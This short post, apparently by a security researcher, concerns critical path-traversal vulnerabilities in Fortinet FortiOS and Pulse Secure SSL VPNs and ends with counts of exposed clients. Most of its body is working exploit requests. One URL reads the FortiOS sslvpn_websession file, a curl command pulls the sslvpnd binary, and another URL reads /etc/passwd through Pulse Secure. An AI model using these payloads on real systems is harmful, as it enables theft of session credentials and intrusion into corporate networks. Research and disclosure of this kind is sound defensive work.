Critical vulnerabilities in Pulse Secure and Fortinet SSL VPNs in the Wild Internet

Valeriy Shevchenko
Sep 2

FortiOS SSL research

http://example.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession/
curl -k "https://example.com/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd" > sslvpnd.bin
And our magic backdoor is on the screen.

Pulse Secure research

https://example.com/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

Summary

1 180 Fortinet SSL Clients
116 723 Fortinet SSL Clients
